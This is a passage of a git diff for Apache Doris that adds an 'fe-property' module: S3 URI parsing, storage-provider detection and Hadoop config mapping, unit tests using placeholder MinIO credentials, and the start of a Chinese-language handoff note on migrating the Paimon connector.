private boolean isPathStyle; + private Map> queryParams; + + /** + * Creates a new S3URI based on the bucket and key parsed from the location as defined in: + * https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingBucket.html#access-bucket-intro + *

      + * Supported access styles are Virtual Hosted addresses and s3://... URIs with additional + * 's3n' and 's3a' schemes supported for backwards compatibility. + * + * @param location fully qualified URI + */ + public static S3URI create(String location) throws StoragePropertiesException { + return create(location, false, false); + } + + public static S3URI create(String location, boolean isPathStyle) throws StoragePropertiesException { + return new S3URI(location, isPathStyle, false); + } + + public static S3URI create(String location, boolean isPathStyle, boolean forceParsingByStandardUri) + throws StoragePropertiesException { + return new S3URI(location, isPathStyle, forceParsingByStandardUri); + } + + private S3URI(String location, boolean isPathStyle, boolean forceParsingByStandardUri) + throws StoragePropertiesException { + if (Strings.isNullOrEmpty(location)) { + throw new StoragePropertiesException("s3 location can not be null"); + } + this.isPathStyle = isPathStyle; + parseUri(location, forceParsingByStandardUri); + } + + private void parseUri(String location, boolean forceParsingStandardUri) throws StoragePropertiesException { + parseURILocation(location); + validateUri(); + + if (!forceParsingStandardUri && OS_SCHEMES.contains(uri.getScheme().toLowerCase())) { + parseAwsCliStyleUri(); + } else { + parseStandardUri(); + } + parseEndpointAndRegion(); + } + + /** + * parse uri location and encode to a URI. + * @param location + * @throws StoragePropertiesException + */ + private void parseURILocation(String location) throws StoragePropertiesException { + Matcher matcher = URI_PATTERN.matcher(location); + if (!matcher.matches()) { + throw new StoragePropertiesException("Failed to parse uri: " + location); + } + String scheme = matcher.group(2); + String authority = matcher.group(4); + String path = matcher.group(5); + String query = matcher.group(7); + String fragment = matcher.group(9); + try { + uri = new URI(scheme, authority, path, query, fragment).normalize(); + } catch (URISyntaxException e) { + throw new StoragePropertiesException(e.getMessage(), e); + } + } + + private void validateUri() throws StoragePropertiesException { + if (uri.getScheme() == null || !VALID_SCHEMES.contains(uri.getScheme().toLowerCase())) { + throw new StoragePropertiesException("Invalid scheme: " + this.uri); + } + } + + private void parseAwsCliStyleUri() throws StoragePropertiesException { + bucket = uri.getAuthority(); + if (bucket == null) { + throw new StoragePropertiesException("missing bucket: " + uri); + } + String path = uri.getPath(); + if (path.length() > 1) { + key = path.substring(1); + } else { + throw new StoragePropertiesException("missing key: " + uri); + } + + addQueryParamsIfNeeded(); + + isStandardURL = false; + this.isPathStyle = false; + } + + private void parseStandardUri() throws StoragePropertiesException { + if (uri.getHost() == null) { + throw new StoragePropertiesException("Invalid S3 URI: no hostname: " + uri); + } + + addQueryParamsIfNeeded(); + + if (isPathStyle) { + parsePathStyleUri(); + } else { + parseVirtualHostedStyleUri(); + } + isStandardURL = true; + } + + private void addQueryParamsIfNeeded() { + if (uri.getQuery() != null) { + queryParams = splitQueryString(uri.getQuery()).stream().map((s) -> s.split("=")) + .map((s) -> s.length == 1 ? new String[] {s[0], null} : s).collect( + Collectors.groupingBy((a) -> a[0], + Collectors.mapping((a) -> a[1], Collectors.toList()))); + } + } + + private static List splitQueryString(String queryString) { + List results = new ArrayList<>(); + StringBuilder result = new StringBuilder(); + + for (int i = 0; i < queryString.length(); ++i) { + char character = queryString.charAt(i); + if (character != '&') { + result.append(character); + } else { + String param = result.toString(); + results.add(param); + result.setLength(0); + } + } + + String param = result.toString(); + results.add(param); + return results; + } + + private void parsePathStyleUri() throws StoragePropertiesException { + String path = uri.getPath(); + + if (!StringUtils.isEmpty(path) && !"/".equals(path)) { + int index = path.indexOf('/', 1); + + if (index == -1) { + // No trailing slash, e.g., "https://s3.amazonaws.com/bucket" + bucket = path.substring(1); + throw new StoragePropertiesException("missing key: " + uri); + } else { + bucket = path.substring(1, index); + if (index != path.length() - 1) { + key = path.substring(index + 1); + } else { + throw new StoragePropertiesException("missing key: " + uri); + } + } + } else { + throw new StoragePropertiesException("missing bucket: " + this.uri); + } + } + + private void parseVirtualHostedStyleUri() throws StoragePropertiesException { + bucket = uri.getHost().split("\\.")[0]; + + String path = uri.getPath(); + if (!StringUtils.isEmpty(path) && !"/".equals(path)) { + key = path.substring(1); + } else { + throw new StoragePropertiesException("missing key from uri: " + this.uri); + } + } + + private void parseEndpointAndRegion() { + // parse endpoint + if (isStandardURL) { + if (isPathStyle) { + endpoint = uri.getAuthority(); + } else { // virtual_host_style + if (uri.getAuthority() == null) { + endpoint = null; + return; + } + String[] splits = uri.getAuthority().split("\\.", 2); + if (splits.length < 2) { + endpoint = null; + return; + } + endpoint = splits[1]; + } + } else { + endpoint = null; + } + if (endpoint == null) { + return; + } + + // parse region + String[] endpointSplits = endpoint.split("\\."); + if (endpointSplits.length < 2) { + return; + } + if (endpointSplits[0].contains("oss-")) { + // compatible with the endpoint: oss-cn-bejing.aliyuncs.com + region = endpointSplits[0]; + return; + } + region = endpointSplits[1]; + } + + /** + * @return S3 bucket + */ + public String getBucket() { + return bucket; + } + + /** + * @return S3 key + */ + public String getKey() { + return key; + } + + public Optional>> getQueryParams() { + return Optional.ofNullable(queryParams); + } + + public Optional getEndpoint() { + return Optional.ofNullable(endpoint); + } + + public Optional getRegion() { + return Optional.ofNullable(region); + } + + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("S3URI{"); + sb.append("uri=").append(uri); + sb.append(", bucket='").append(bucket).append('\''); + sb.append(", key='").append(key).append('\''); + sb.append(", endpoint='").append(endpoint).append('\''); + sb.append(", region='").append(region).append('\''); + sb.append(", isStandardURL=").append(isStandardURL); + sb.append(", isPathStyle=").append(isPathStyle); + sb.append(", queryParams=").append(queryParams); + sb.append('}'); + return sb.toString(); + } + + /** + * Check if this S3URI uses a directory bucket. + * + * @return true if the bucket is a directory bucket + */ + public boolean useS3DirectoryBucket() { + return isS3DirectoryBucket(this.bucket); + } + + /** + * Check if the bucket name indicates the bucket is a directory bucket. This method does not check + * against the S3 service. + * + *

      Directory bucket names follow the format: bucket-name--azid--x-s3 + * where azid is an availability zone identifier like "usw2-az1", "use1-az4", etc. + * + * @param bucketName bucket to probe. + * @return true if the bucket name indicates the bucket is a directory bucket + */ + public static boolean isS3DirectoryBucket(final String bucketName) { + if (bucketName == null || !bucketName.endsWith(S3_DIRECTORY_BUCKET_SUFFIX)) { + return false; + } + // Check if the bucket name has the correct format: bucket-name--azid--x-s3 + // The bucket name should have at least 3 segments separated by "--" + String[] segments = bucketName.split("--"); + if (segments.length < 3) { + return false; + } + // The last segment should be "x-s3" + if (!"x-s3".equals(segments[segments.length - 1])) { + return false; + } + // The second-to-last segment should be the availability zone identifier + // It should have a format like "usw2-az1", "use1-az4", etc. + String azid = segments[segments.length - 2]; + if (azid == null || azid.isEmpty()) { + return false; + } + // Basic validation: azid should contain at least one hyphen and not be empty + // More sophisticated validation could be added here if needed + return azid.contains("-") && azid.length() > 3; + } + + /** + * Adjusts a glob prefix for S3 Directory Bucket listing. + *

      + * For Directory Buckets, listing with a prefix like "path/to/files" will not return any results + * if the objects are "path/to/files1.csv", "path/to/files2.csv", etc. The prefix needs to be + * adjusted to the containing "directory", which is "path/to/". + * + * @param globPrefix The prefix derived from a glob pattern (e.g., "path/to/files" from "path/to/files*.csv"). + * @return The adjusted prefix ending with a "/" (e.g., "path/to/"), or an empty string if no "/" is present. + */ + public static String getDirectoryPrefixForGlob(final String globPrefix) { + if (globPrefix == null || globPrefix.isEmpty() || globPrefix.endsWith("/")) { + return globPrefix; + } + int lastSlashIndex = globPrefix.lastIndexOf('/'); + if (lastSlashIndex >= 0) { + return globPrefix.substring(0, lastSlashIndex + 1); + } + return ""; + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/StorageProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/StorageProperties.java new file mode 100644 index 00000000000000..d7fd8cb637489a --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/StorageProperties.java @@ -0,0 +1,409 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.apache.doris.foundation.property.ConnectorProperty; +import org.apache.doris.foundation.property.StoragePropertiesException; +import org.apache.doris.property.ConnectionProperties; + +import lombok.Getter; +import org.apache.commons.lang3.BooleanUtils; +import org.apache.commons.lang3.StringUtils; + +import java.lang.reflect.Field; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.HashMap; +import java.util.LinkedHashMap; +import java.util.List; +import java.util.Map; +import java.util.Set; +import java.util.function.BiFunction; + +public abstract class StorageProperties extends ConnectionProperties { + + public static final String FS_HDFS_SUPPORT = "fs.hdfs.support"; + public static final String FS_S3_SUPPORT = "fs.s3.support"; + public static final String FS_GCS_SUPPORT = "fs.gcs.support"; + public static final String FS_MINIO_SUPPORT = "fs.minio.support"; + public static final String FS_OZONE_SUPPORT = "fs.ozone.support"; + public static final String FS_BROKER_SUPPORT = "fs.broker.support"; + public static final String FS_AZURE_SUPPORT = "fs.azure.support"; + public static final String FS_OSS_SUPPORT = "fs.oss.support"; + public static final String FS_OBS_SUPPORT = "fs.obs.support"; + public static final String FS_COS_SUPPORT = "fs.cos.support"; + public static final String FS_OSS_HDFS_SUPPORT = "fs.oss-hdfs.support"; + public static final String FS_LOCAL_SUPPORT = "fs.local.support"; + public static final String FS_HTTP_SUPPORT = "fs.http.support"; + + public static final String DEPRECATED_OSS_HDFS_SUPPORT = "oss.hdfs.enabled"; + protected static final String URI_KEY = "uri"; + + public static final String FS_PROVIDER_KEY = "provider"; + + protected final String userFsPropsPrefix = "fs."; + + public enum Type { + HDFS, + S3, + OSS, + OBS, + COS, + GCS, + OSS_HDFS, + MINIO, + OZONE, + AZURE, + BROKER, + LOCAL, + HTTP, + UNKNOWN + } + + public abstract Map getBackendConfigProperties(); + + /** + * Normalized Hadoop-style storage configuration as a flat key/value map (e.g. {@code fs.s3a.*}, + * {@code fs.cosn.*}, {@code fs.obs.*}, {@code fs.azure.*}, {@code dfs.*}). This module deliberately does NOT + * build a live Hadoop {@code Configuration} object: it only produces the keys to set. Consumers (fe-core, SPI + * connectors) overlay this map onto their own {@code Configuration} (e.g. + * {@code getHadoopConfigMap().forEach(conf::set)}) using their own hadoop dependency. + *

      + * A {@code null} value means this storage backend contributes no Hadoop config (e.g. HTTP), preserving the + * legacy semantics where {@code hadoopConfigMap} was left null and the user-fs/disable-cache overlay was + * skipped. + */ + @Getter + protected Map hadoopConfigMap; + + /** + * Get backend configuration properties with optional runtime properties. + * This method allows passing runtime properties (like vended credentials) + * that should be merged with the base configuration. + * + * @param runtimeProperties additional runtime properties to merge, can be null + * @return Map of backend properties including runtime properties + */ + public Map getBackendConfigProperties(Map runtimeProperties) { + Map properties = new HashMap<>(getBackendConfigProperties()); + if (runtimeProperties != null && !runtimeProperties.isEmpty()) { + properties.putAll(runtimeProperties); + } + return properties; + } + + @Getter + protected Type type; + + + /** + * Creates a list of StorageProperties instances based on the provided properties. + *

      + * This method iterates through all registered storage providers and constructs one + * {@link StorageProperties} instance for each provider that recognizes the given properties. + *

      + * If no HDFSProperties is explicitly configured, a default HDFSProperties will be added + * automatically. The default HDFSProperties is inserted at index 0 to ensure that: + *

        + *
      • The list preserves a deterministic order (it is an ordered List).
      • + *
      • The default HDFS configuration does not override or shadow explicitly configured + * object storage providers, which are appended after detection.
      • + *
      + * + * @param origProps the raw property map used to initialize each StorageProperties instance + * @return an ordered list of StorageProperties instances + */ + public static List createAll(Map origProps) throws StoragePropertiesException { + List result = new ArrayList<>(); + // If the user has explicitly specified any fs.xx.support=true, disable guessIsMe heuristics + // for all providers to avoid false-positive matches from ambiguous endpoint strings. + boolean useGuess = !hasAnyExplicitFsSupport(origProps); + for (BiFunction, Boolean, StorageProperties> func : PROVIDERS) { + StorageProperties p = func.apply(origProps, useGuess); + if (p != null) { + result.add(p); + } + } + // When no explicit fs.xx.support flag is set, add a default HDFS storage as fallback. + // When the user has explicitly declared providers via fs.xx.support=true, skip the + // default HDFS to avoid injecting an unwanted provider into the result. + if (useGuess && result.stream().noneMatch(HdfsProperties.class::isInstance)) { + result.add(0, new HdfsProperties(origProps, false)); + } + + for (StorageProperties storageProperties : result) { + storageProperties.initNormalizeAndCheckProps(); + storageProperties.buildHadoopStorageConfig(); + } + return result; + } + + /** + * Creates a primary StorageProperties instance based on the provided properties. + *

      + * This method iterates through the list of supported storage types and returns the first + * matching StorageProperties instance. If no supported type is found, an exception is thrown. + * + * @param origProps the original properties map to create the StorageProperties instance + * @return a StorageProperties instance for the primary storage type + * @throws RuntimeException if no supported storage type is found + */ + public static StorageProperties createPrimary(Map origProps) { + // If the user has explicitly specified any fs.xx.support=true, disable guessIsMe heuristics + // for all providers to avoid false-positive matches from ambiguous endpoint strings. + boolean useGuess = !hasAnyExplicitFsSupport(origProps); + for (BiFunction, Boolean, StorageProperties> func : PROVIDERS) { + StorageProperties p = func.apply(origProps, useGuess); + if (p != null) { + p.initNormalizeAndCheckProps(); + p.buildHadoopStorageConfig(); + return p; + } + } + throw new StoragePropertiesException("No supported storage type found. Please check your configuration."); + } + + /** + * Connector-facing helper: builds the merged Hadoop object-storage config map ({@code fs.s3a.*}/{@code fs.oss.*}/ + * {@code fs.cosn.*}/{@code fs.obs.*}) for whatever object-store backends the raw properties configure. Unlike + * {@link #createAll}, it injects NO default HDFS fallback and does NOT fail when no object store is present + * (returns an empty map). HDFS / local / broker / http contribute nothing here: a connector overlays the raw + * {@code fs.*}/{@code dfs.*}/{@code hadoop.*} passthrough itself. Used by SPI connectors that build their own + * {@link java.util.Map}-backed Hadoop config (e.g. paimon) instead of importing fe-core's StorageProperties. + * + * @param origProps the raw user property map + * @return the merged object-storage Hadoop config keys (possibly empty), never null + */ + public static Map buildObjectStorageHadoopConfig(Map origProps) { + Map merged = new LinkedHashMap<>(); + boolean useGuess = !hasAnyExplicitFsSupport(origProps); + for (BiFunction, Boolean, StorageProperties> func : PROVIDERS) { + StorageProperties p = func.apply(origProps, useGuess); + if (p == null || !isObjectStorage(p.getType())) { + continue; + } + p.initNormalizeAndCheckProps(); + p.buildHadoopStorageConfig(); + if (p.getHadoopConfigMap() != null) { + merged.putAll(p.getHadoopConfigMap()); + } + } + return merged; + } + + /** Whether the given type is an object-storage backend (vs HDFS / broker / local / http / unknown). */ + private static boolean isObjectStorage(Type type) { + switch (type) { + case S3: + case OSS: + case OBS: + case COS: + case GCS: + case OSS_HDFS: + case MINIO: + case OZONE: + case AZURE: + return true; + default: + return false; + } + } + + /** + * Registry of all supported storage provider detection functions. + *

      + * Each entry is a {@link BiFunction} that takes: + *

        + *
      • {@code props} — the user-supplied property map
      • + *
      • {@code guess} — whether heuristic-based {@code guessIsMe} detection is enabled. + * When {@code false}, only explicit {@code fs.xx.support=true} flags are honored, + * preventing endpoint-based heuristics from causing false-positive matches + * across providers (e.g., an {@code aliyuncs.com} endpoint accidentally + * matching both OSS and S3).
      • + *
      + * Returns a {@link StorageProperties} instance if the provider matches, or {@code null} otherwise. + */ + private static final List, Boolean, StorageProperties>> PROVIDERS = + Arrays.asList( + (props, guess) -> (isFsSupport(props, FS_HDFS_SUPPORT) + || (guess && HdfsProperties.guessIsMe(props))) ? new HdfsProperties(props) : null, + (props, guess) -> { + // OSS-HDFS and OSS are mutually exclusive - check OSS-HDFS first + if ((isFsSupport(props, FS_OSS_HDFS_SUPPORT) + || isFsSupport(props, DEPRECATED_OSS_HDFS_SUPPORT)) + || (guess && OSSHdfsProperties.guessIsMe(props))) { + return new OSSHdfsProperties(props); + } + // Only check for regular OSS if OSS-HDFS is not enabled + if (isFsSupport(props, FS_OSS_SUPPORT) + || (guess && OSSProperties.guessIsMe(props))) { + return new OSSProperties(props); + } + return null; + }, + (props, guess) -> (isFsSupport(props, FS_S3_SUPPORT) + || (guess && S3Properties.guessIsMe(props))) ? new S3Properties(props) : null, + (props, guess) -> (isFsSupport(props, FS_OBS_SUPPORT) + || (guess && OBSProperties.guessIsMe(props))) ? new OBSProperties(props) : null, + (props, guess) -> (isFsSupport(props, FS_COS_SUPPORT) + || (guess && COSProperties.guessIsMe(props))) ? new COSProperties(props) : null, + (props, guess) -> (isFsSupport(props, FS_GCS_SUPPORT) + || (guess && GCSProperties.guessIsMe(props))) ? new GCSProperties(props) : null, + (props, guess) -> (isFsSupport(props, FS_AZURE_SUPPORT) + || (guess && AzureProperties.guessIsMe(props))) ? new AzureProperties(props) : null, + (props, guess) -> (isFsSupport(props, FS_MINIO_SUPPORT) + || (guess && MinioProperties.guessIsMe(props))) ? new MinioProperties(props) : null, + (props, guess) -> isFsSupport(props, FS_OZONE_SUPPORT) ? new OzoneProperties(props) : null, + (props, guess) -> (isFsSupport(props, FS_BROKER_SUPPORT) + || (guess && BrokerProperties.guessIsMe(props))) ? new BrokerProperties(props) : null, + (props, guess) -> (isFsSupport(props, FS_LOCAL_SUPPORT) + || (guess && LocalProperties.guessIsMe(props))) ? new LocalProperties(props) : null, + (props, guess) -> (isFsSupport(props, FS_HTTP_SUPPORT) + || (guess && HttpProperties.guessIsMe(props))) ? new HttpProperties(props) : null + ); + + protected StorageProperties(Type type, Map origProps) { + super(origProps); + this.type = type; + } + + private static boolean isFsSupport(Map origProps, String fsEnable) { + return origProps.getOrDefault(fsEnable, "false").equalsIgnoreCase("true"); + } + + /** + * Checks whether the user has explicitly set any {@code fs.xx.support=true} property. + *

      + * When at least one explicit {@code fs.xx.support} flag is present, the system should + * rely solely on these flags for provider matching and skip the heuristic-based + * {@code guessIsMe} inference. This prevents ambiguous endpoint strings (e.g., + * {@code aliyuncs.com}) from accidentally triggering multiple providers (e.g., + * both OSS and S3) at the same time. + * + * @param props the raw property map from user configuration + * @return {@code true} if any {@code fs.xx.support} property is explicitly set to "true" + */ + private static boolean hasAnyExplicitFsSupport(Map props) { + return isFsSupport(props, FS_HDFS_SUPPORT) + || isFsSupport(props, FS_S3_SUPPORT) + || isFsSupport(props, FS_GCS_SUPPORT) + || isFsSupport(props, FS_MINIO_SUPPORT) + || isFsSupport(props, FS_BROKER_SUPPORT) + || isFsSupport(props, FS_AZURE_SUPPORT) + || isFsSupport(props, FS_OSS_SUPPORT) + || isFsSupport(props, FS_OBS_SUPPORT) + || isFsSupport(props, FS_COS_SUPPORT) + || isFsSupport(props, FS_OSS_HDFS_SUPPORT) + || isFsSupport(props, FS_LOCAL_SUPPORT) + || isFsSupport(props, FS_HTTP_SUPPORT) + || isFsSupport(props, FS_OZONE_SUPPORT) + || isFsSupport(props, DEPRECATED_OSS_HDFS_SUPPORT); + } + + protected static boolean checkIdentifierKey(Map origProps, List fields) { + for (Field field : fields) { + field.setAccessible(true); + ConnectorProperty annotation = field.getAnnotation(ConnectorProperty.class); + for (String key : annotation.names()) { + if (origProps.containsKey(key)) { + return true; + } + } + } + return false; + } + + /** + * Validates the given URL string and returns a normalized URI in the format: scheme://authority/path. + *

      + * This method checks that the input is non-empty, the scheme is present and supported (e.g., hdfs, viewfs), + * and converts it into a canonical URI string. + * + * @param url the raw URL string to validate and normalize + * @return a normalized URI string with validated scheme and authority + * @throws StoragePropertiesException if the URL is empty, lacks a valid scheme, or contains an unsupported scheme + */ + public abstract String validateAndNormalizeUri(String url) throws StoragePropertiesException; + + /** + * Extracts the URI string from the provided properties map, validates it, and returns the normalized URI. + *

      + * This method checks that the 'uri' key exists in the property map, retrieves the value, + * and then delegates to {@link #validateAndNormalizeUri(String)} for further validation and normalization. + * + * @param loadProps the map containing load-related properties, including the URI under the key 'uri' + * @return a normalized and validated URI string + * @throws StoragePropertiesException if the 'uri' property is missing, empty, or invalid + */ + public abstract String validateAndGetUri(Map loadProps) throws StoragePropertiesException; + + public abstract String getStorageName(); + + private void buildHadoopStorageConfig() { + initializeHadoopStorageConfig(); + if (null == hadoopConfigMap) { + return; + } + appendUserFsConfig(origProps); + ensureDisableCache(hadoopConfigMap, origProps); + } + + private void appendUserFsConfig(Map userProps) { + userProps.forEach((k, v) -> { + if (k.startsWith(userFsPropsPrefix) && StringUtils.isNotBlank(v)) { + hadoopConfigMap.put(k, v); + } + }); + } + + protected abstract void initializeHadoopStorageConfig(); + + protected abstract Set schemas(); + + /** + * By default, Hadoop caches FileSystem instances per scheme and authority (e.g. s3a://bucket/), meaning that all + * subsequent calls using the same URI will reuse the same FileSystem object. + * In multi-tenant or dynamic credential environments — where different users may access the same bucket using + * different access keys or tokens — this cache reuse can lead to cross-credential contamination. + *

      + * Specifically, if the cache is not disabled, a FileSystem instance initialized with one set of credentials may + * be reused by another session targeting the same bucket but with a different AK/SK. This results in: + *

      + * Incorrect authentication (using stale credentials) + *

      + * Unexpected permission errors or access denial + *

      + * Potential data leakage between users + *

      + * To avoid such risks, the configuration property + * fs..impl.disable.cache + * must be set to true for all object storage backends (e.g., S3A, OSS, COS, OBS), ensuring that each new access + * creates an isolated FileSystem instance with its own credentials and configuration context. + */ + private void ensureDisableCache(Map conf, Map origProps) { + for (String schema : schemas()) { + String key = "fs." + schema + ".impl.disable.cache"; + String userValue = origProps.get(key); + if (StringUtils.isNotBlank(userValue)) { + conf.put(key, String.valueOf(BooleanUtils.toBoolean(userValue))); + } else { + conf.put(key, "true"); + } + } + } +} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/exception/AzureAuthType.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/exception/AzureAuthType.java new file mode 100644 index 00000000000000..6ca8777574c445 --- /dev/null +++ b/fe/fe-property/src/main/java/org/apache/doris/property/storage/exception/AzureAuthType.java @@ -0,0 +1,23 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage.exception; + +public enum AzureAuthType { + OAuth2, + SharedKey; +} diff --git a/fe/fe-property/src/test/java/org/apache/doris/property/storage/StoragePropertiesTest.java b/fe/fe-property/src/test/java/org/apache/doris/property/storage/StoragePropertiesTest.java new file mode 100644 index 00000000000000..d5e999de146fa1 --- /dev/null +++ b/fe/fe-property/src/test/java/org/apache/doris/property/storage/StoragePropertiesTest.java @@ -0,0 +1,117 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.property.storage; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** + * Behavior tests for the extracted fe-property storage layer. + * + *

      WHY these matter: the connector (e.g. {@code PaimonCatalogFactory}) cannot import fe-core's + * {@code StorageProperties}, so today it hand-re-ports the {@code fs.s3a.*} derivation (the source of the MinIO + * credential bug). This module exists so a connector can instead call + * {@code StorageProperties.create(props).getHadoopConfigMap()}. These tests pin the two outputs a connector relies + * on — the Hadoop config map ({@code fs.s3a.*}, applied to the connector's own {@code Configuration}) and the + * BE-facing map ({@code AWS_*}) — so the derivation can never silently drift away from the legacy behavior. + */ +public class StoragePropertiesTest { + + private static Map minioProps() { + Map p = new HashMap<>(); + // fs.minio.support pins MinIO selection deterministically (explicit flag disables guessIsMe heuristics). + p.put("fs.minio.support", "true"); + p.put("minio.endpoint", "http://minio:9000"); + p.put("minio.access_key", "myak"); + p.put("minio.secret_key", "mysk"); + return p; + } + + @Test + public void minioProducesS3aHadoopConfigMap() { + StorageProperties sp = StorageProperties.createPrimary(minioProps()); + Assertions.assertEquals(StorageProperties.Type.MINIO, sp.getType()); + + // The module produces a Map (NOT a live Hadoop Configuration) for the connector to overlay. + Map hadoop = sp.getHadoopConfigMap(); + Assertions.assertNotNull(hadoop); + Assertions.assertEquals("http://minio:9000", hadoop.get("fs.s3a.endpoint")); + Assertions.assertEquals("myak", hadoop.get("fs.s3a.access.key")); + Assertions.assertEquals("mysk", hadoop.get("fs.s3a.secret.key")); + Assertions.assertEquals("us-east-1", hadoop.get("fs.s3a.endpoint.region")); + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", hadoop.get("fs.s3a.impl")); + // disable-cache must be on for object stores (per-credential FileSystem isolation). + Assertions.assertEquals("true", hadoop.get("fs.s3a.impl.disable.cache")); + } + + @Test + public void minioProducesBackendAwsMap() { + StorageProperties sp = StorageProperties.createPrimary(minioProps()); + Map be = sp.getBackendConfigProperties(); + Assertions.assertEquals("http://minio:9000", be.get("AWS_ENDPOINT")); + Assertions.assertEquals("myak", be.get("AWS_ACCESS_KEY")); + Assertions.assertEquals("mysk", be.get("AWS_SECRET_KEY")); + Assertions.assertEquals("us-east-1", be.get("AWS_REGION")); + // MinIO tuning defaults (100/10000/10000) — the exact values the connector re-port had to match. + Assertions.assertEquals("100", be.get("AWS_MAX_CONNECTIONS")); + } + + @Test + public void s3IsSelectedAndNormalizesUri() { + Map p = new HashMap<>(); + p.put("s3.endpoint", "s3.us-east-1.amazonaws.com"); + p.put("s3.access_key", "ak"); + p.put("s3.secret_key", "sk"); + p.put("s3.region", "us-east-1"); + StorageProperties sp = StorageProperties.createPrimary(p); + Assertions.assertEquals(StorageProperties.Type.S3, sp.getType()); + Assertions.assertEquals("s3.us-east-1.amazonaws.com", sp.getHadoopConfigMap().get("fs.s3a.endpoint")); + // Non-canonical schemes normalize to the canonical s3:// form BE understands. + Assertions.assertEquals("s3://bucket/key", sp.validateAndNormalizeUri("s3a://bucket/key")); + } + + @Test + public void guessOrderingKeepsMinioAndS3Distinct() { + // An amazonaws endpoint is S3, NOT MinIO: MinIO must defer to S3 so detection isn't hijacked. + Map s3 = new HashMap<>(); + s3.put("s3.endpoint", "s3.us-east-1.amazonaws.com"); + Assertions.assertTrue(S3Properties.guessIsMe(s3)); + Assertions.assertFalse(MinioProperties.guessIsMe(s3)); + + // A dedicated minio.* key with a non-amazonaws endpoint is MinIO. + Map mi = new HashMap<>(); + mi.put("minio.endpoint", "http://minio:9000"); + mi.put("minio.access_key", "ak"); + Assertions.assertTrue(MinioProperties.guessIsMe(mi)); + Assertions.assertFalse(S3Properties.guessIsMe(mi)); + } + + @Test + public void hadoopConfigMapIsNullForHttp() { + // HTTP contributes no Hadoop storage config — the null map signals "skip overlay" to consumers. + Map p = new HashMap<>(); + p.put("fs.http.support", "true"); + p.put("uri", "https://example.com/a.csv"); + StorageProperties sp = StorageProperties.createPrimary(p); + Assertions.assertEquals(StorageProperties.Type.HTTP, sp.getType()); + Assertions.assertNull(sp.getHadoopConfigMap()); + } +} diff --git a/fe/pom.xml b/fe/pom.xml index e08c17d35d1cdc..7cb62d53c31daf 100644 --- a/fe/pom.xml +++ b/fe/pom.xml @@ -218,6 +218,7 @@ under the License. fe-foundation + fe-property fe-common fe-catalog fe-filesystem @@ -824,6 +825,11 @@ under the License. fe-foundation ${project.version} + + ${project.groupId} + fe-property + ${project.version} + ${project.groupId} fe-common diff --git a/plan-doc/designs/fe-property-module-HANDOFF-2026-06-15.md b/plan-doc/designs/fe-property-module-HANDOFF-2026-06-15.md new file mode 100644 index 00000000000000..b1a3a29f5f8903 --- /dev/null +++ b/plan-doc/designs/fe-property-module-HANDOFF-2026-06-15.md @@ -0,0 +1,113 @@ +# fe-property 模块 —— 开发 HANDOFF(storage 首期) + +> 日期:2026-06-15 | 分支:catalog-spi-07-paimon | 设计:`plan-doc/designs/fe-property-module-design-2026-06-15.md` +> 状态:**M1+M2+M3+M4 完成(uncommitted)**;M5 = 本文。 + +## M4 完成(paimon 连接器迁移,strangler-fig 阶段2)—— 2026-06-15 + +**做法=Hybrid(用户决策)**:连接器把 canonical 对象存储别名→`fs.s3a.*/fs.oss.*/fs.cosn.*/fs.obs.*` 翻译**委托给 fe-property**,保留连接器特有的 `paimon.*` 重写 + 原始 `fs./dfs./hadoop.` 透传。 +- `fe-connector-paimon/pom.xml`:加 `fe-property` compile 依赖(plugin-zip assembly 未排除 → 随 fe-foundation 一起 child-first 打包)。 +- `PaimonCatalogFactory.applyStorageConfig`:5 个 `applyCanonical*` 调用 → `StorageProperties.buildObjectStorageHadoopConfig(props).forEach(setter)`;删除 6 个 canonical 方法 + 全部别名数组/默认值/impl 常量 + 4 个仅 canonical 用的 helper(`firstNonBlankOrDefault/anyKeyStartsWith/containsToken/isClassAvailable`)。**文件 988→626 行(−362)**。保留 `firstNonBlank/nullToEmpty/USER_STORAGE_PREFIXES/FS_S3A_PREFIX`(透传/DLF/HMS 仍用)。 +- 新增 fe-property 入口 `StorageProperties.buildObjectStorageHadoopConfig(Map)`:只对象存储(跳过 HDFS/broker/local/http→避开 createAll 的默认 HDFS+checkHaConfig 抛错),无匹配返回空 map(不抛)。 + +**验收**:`PaimonCatalogFactoryTest` 